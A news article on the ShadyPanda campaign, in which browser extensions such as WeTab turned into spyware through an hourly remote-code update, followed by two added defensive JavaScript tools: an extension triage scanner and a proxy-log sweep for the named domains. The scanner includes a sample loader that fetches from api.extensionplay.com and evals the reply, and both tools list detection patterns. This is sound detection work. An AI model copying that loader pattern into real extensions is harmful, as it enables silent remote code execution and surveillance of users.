ShadyPanda Exploits Browser Extensions to Conduct Extensive Surveillance Operations

By Tina Reynolds

A joint investigation has revealed an extensive surveillance operation by the threat actor commonly referred to as ShadyPanda. The group has operated with growing stealth over the past seven years, harvesting sensitive user data through malicious browser extensions. The findings have prompted a national outcry. More than 4.3 million installations across platforms including Microsoft Edge show the chilling reach.

In 2023 alone, ShadyPanda published five new extensions in the Microsoft Edge Add-ons store, WeTab among them. Soon afterwards, this most recent extension leveraged its massive user base to begin mass surveillance. ShadyPanda’s campaign is primarily about data collection: monitoring every URL you navigate to, your search terms, mouse movements, cookies, and browser fingerprints.

As the campaign progressed into early 2024, it escalated: the seemingly innocuous browser extensions became tools capable of aggressively manipulating browser behavior, including search-query hijacking and scraping cookies from targeted sites.

Overview of ShadyPanda’s Campaign

The ShadyPanda browser-extension campaign developed through four phases. After an initial period in which the extensions provided legitimate, helpful services, three subsequent phases turned them into invasive, covert spyware: the extensions were hijacked to push out a malicious update that added backdoor-like capabilities.

The update added a scheduled (cron-like) task that contacts the api.extensionplay.com domain hourly, giving the malicious extensions a channel to download and run a malicious JavaScript payload. This turned a fixed feature set into an open-ended one: the extensions can now run arbitrary code with complete access to users’ browsers.

“These extensions now run hourly remote code execution – downloading and executing arbitrary JavaScript with full browser access.” – Tuval Admoni

The updates were pushed silently to extensions that had functioned legitimately for years. Three of them enjoyed widespread public trust, which made the eventual exploitation all the more insidious.
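The mechanism described above (a timer, a fetch from a remote host, and execution of whatever comes back) is something an extension reviewer can look for statically. The following is an added example, not code from the article or from the researchers it quotes: a small Node script that scores an extension's JavaScript against a handful of heuristic indicators. The two sample sources are constructed for illustration; the only real value in them is the api.extensionplay.com domain named in the article, and api.example.com is a placeholder.

```javascript
// Static triage of a browser extension's JavaScript for the pattern the article describes:
// a scheduled task that fetches code from a remote host and executes it.
// Added example (not the article's or the researchers' code); runs under Node, no dependencies.

// Heuristic indicators a reviewer looks for in a background or new-tab script.
// Each is a plain regex; a single hit is not proof of malice, the combination is what matters.
const INDICATORS = [
  { id: 'scheduled-task', re: /chrome\.alarms\.create\s*\(|setInterval\s*\(/ },
  { id: 'remote-fetch',   re: /\bfetch\s*\(\s*['"`]https?:\/\/|new\s+XMLHttpRequest\s*\(/ },
  { id: 'dynamic-exec',   re: /\beval\s*\(|new\s+Function\s*\(|executeScript\s*\(\s*\{[^}]*\bcode\s*:/ },
  // Domain named in the reporting as the hourly update endpoint.
  { id: 'known-c2',       re: /\bapi\.extensionplay\.com\b/ },
];

// Collect every hostname the script references in an http(s) URL.
function extractHosts(source) {
  const hosts = new Set();
  const urlRe = /https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = urlRe.exec(source)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts].sort();
}

// Score one extension source. The remote-code-execution pattern needs all three of
// timer + remote fetch + dynamic execution; a known indicator domain is "high" on its own,
// and dynamic execution by itself is worth a manual look ("medium").
function triageExtension(name, source) {
  const hits = INDICATORS.filter(ind => ind.re.test(source)).map(ind => ind.id);
  const remoteExecPattern = ['scheduled-task', 'remote-fetch', 'dynamic-exec']
    .every(id => hits.includes(id));
  let verdict = 'low';
  if (hits.includes('known-c2') || remoteExecPattern) verdict = 'high';
  else if (hits.includes('dynamic-exec')) verdict = 'medium';
  return { name, hits, hosts: extractHosts(source), remoteExecPattern, verdict };
}

// CONSTRUCTED sample sources; api.example.com is a placeholder host.
const SAMPLES = {
  // Benign new-tab page: periodic JSON fetch rendered through the DOM, never executed.
  benignNewTab: `
    chrome.alarms.create('refresh', { periodInMinutes: 30 });
    chrome.alarms.onAlarm.addListener(async () => {
      const r = await fetch('https://api.example.com/weather.json');
      const data = await r.json();
      document.getElementById('temp').textContent = data.temp;
    });`,
  // Shape of the update the article describes: hourly alarm, fetch text, execute it.
  hourlyRemoteLoader: `
    chrome.alarms.create('sync', { periodInMinutes: 60 });
    chrome.alarms.onAlarm.addListener(async () => {
      const r = await fetch('https://api.extensionplay.com/update');
      eval(await r.text());
    });`,
};

// Triage every sample and return the results keyed by sample name.
function triageAll() {
  return Object.fromEntries(
    Object.entries(SAMPLES).map(([name, src]) => [name, triageExtension(name, src)]),
  );
}

for (const r of Object.values(triageAll())) {
  console.log(`${r.name}: ${r.verdict} (${r.hits.join(', ') || 'no indicators'}) hosts=${r.hosts.join(',')}`);
}
```

The benign sample also has a timer and a remote fetch, and it still scores low: what separates an update checker from a loader is the `eval`/`new Function` step that turns fetched text into running code, which is why the verdict keys on the combination rather than on any single indicator.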

WeTab’s Role in Data Collection

One of the identified extensions is WeTab, which alone accounts for some three million installations. It used that massive user base to conduct extensive surveillance, logging every site visit, every search-engine query, and mouse movements.

All of the data it gathered was then transmitted to servers in, you guessed it, China. This is deeply troubling for user privacy and data security. WeTab’s surveillance capabilities are striking: it can monitor every URL you visit, exfiltrate your encrypted browsing history, and collect full browser fingerprints.

“They monitor every website visit, exfiltrate encrypted browsing history, and collect complete browser fingerprints.” – Tuval Admoni

WeTab remains available for download, continuing to expose unsuspecting users to the same risk.

Response from Microsoft and Security Researchers

In response, Microsoft removed all extensions flagged as malicious from the Edge Add-on store. The step followed the alarming developments described above. The company repeatedly pointed to its work in protecting the integrity of its platforms and the security of its users.

“We have removed all the extensions identified as malicious on the Edge Add-on store. When we become aware of instances that violate our policies, we take appropriate action that includes, but is not limited to, the removal of prohibited content or termination of our publishing agreement.” – Microsoft spokesperson

Security researchers point to the failures that allowed these extensions to be weaponized: the review process for browser extensions at these marketplaces is deeply flawed, and ShadyPanda exploited those weaknesses for several months.

“The auto-update mechanism – designed to keep users secure – became the attack vector.” – Koi

According to reports, the affected extensions redirected all web searches to trovi.com, a site recently classified as a known browser hijacker. That compounded the risk for users who had installed these harmless-looking tools.
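For an incident responder, the two domains the article names are the most actionable details: api.extensionplay.com (the hourly update endpoint described earlier) and trovi.com (the search-hijack destination). The following is an added example, not code from the article or from the researchers it quotes: a Node script that sweeps proxy-log lines for both domains, checks whether contacts to a domain recur at the hourly period the reporting describes, and lists the search terms that were carried to the hijack domain so the analyst can see what was exposed. The log lines, their simplified format, and the client addresses are constructed for the example.

```javascript
// Proxy-log sweep for the two domains named in the reporting, with a periodicity check that
// surfaces the hourly beacon and a view of which search terms left the network.
// Added example (not the article's or the researchers' code); runs under Node, no dependencies.

const INDICATOR_DOMAINS = new Set(['api.extensionplay.com', 'trovi.com']);
const BEACON_PERIOD_S = 3600;    // the reporting says the update check runs hourly
const BEACON_TOLERANCE_S = 120;  // jitter allowed around that period

// CONSTRUCTED log lines in a simplified "timestamp client method url status" format.
// 10.0.0.12 shows the infected pattern; 10.0.0.7 is ordinary browsing.
const LOG_LINES = [
  '2024-02-03T10:00:02Z 10.0.0.12 GET https://api.extensionplay.com/update 200',
  '2024-02-03T10:12:40Z 10.0.0.7  GET https://www.bing.com/search?q=team%20lunch 200',
  '2024-02-03T10:31:11Z 10.0.0.12 GET https://www.google.com/search?q=quarterly%20report 200',
  '2024-02-03T10:31:12Z 10.0.0.12 GET https://trovi.com/?q=quarterly%20report 302',
  '2024-02-03T11:00:05Z 10.0.0.12 GET https://api.extensionplay.com/update 200',
  '2024-02-03T11:45:00Z 10.0.0.7  GET https://example.com/ 200',
  '2024-02-03T12:00:01Z 10.0.0.12 GET https://api.extensionplay.com/update 200',
];

// Parse one log line into a record with a numeric timestamp and a parsed URL.
function parseLine(line) {
  const [ts, client, method, rawUrl, status] = line.trim().split(/\s+/);
  const url = new URL(rawUrl);
  return { ts: Date.parse(ts), client, method, host: url.hostname, url, status: Number(status) };
}

// Returns one finding per (client, indicator domain) pair, keyed "client host".
function sweep(lines) {
  const groups = new Map();
  for (const e of lines.map(parseLine)) {
    if (!INDICATOR_DOMAINS.has(e.host)) continue;
    const key = `${e.client} ${e.host}`;
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(e);
  }
  const findings = {};
  for (const [key, events] of groups) {
    events.sort((a, b) => a.ts - b.ts);
    // Seconds between consecutive contacts; a beacon is a run of near-constant intervals.
    const intervals = events.slice(1).map((e, i) => (e.ts - events[i].ts) / 1000);
    const hourlyBeacon = intervals.length >= 2 &&
      intervals.every(s => Math.abs(s - BEACON_PERIOD_S) <= BEACON_TOLERANCE_S);
    // Search terms carried to the hijack domain tell the analyst what was exposed.
    const leakedQueries = events.map(e => e.url.searchParams.get('q')).filter(Boolean);
    findings[key] = {
      client: events[0].client, host: events[0].host,
      count: events.length, intervals, hourlyBeacon, leakedQueries,
    };
  }
  return findings;
}

for (const f of Object.values(sweep(LOG_LINES))) {
  console.log(`${f.client} -> ${f.host}: ${f.count} request(s)` +
    (f.hourlyBeacon ? ' [hourly beacon]' : '') +
    (f.leakedQueries.length ? ` queries=${JSON.stringify(f.leakedQueries)}` : ''));
}
```

Two contacts are enough to match the domain list but not to call something a beacon, so the periodicity check waits for at least two intervals; the tolerance is an assumption for the sample data and should be tuned to how much jitter the real scheduler shows in your own logs.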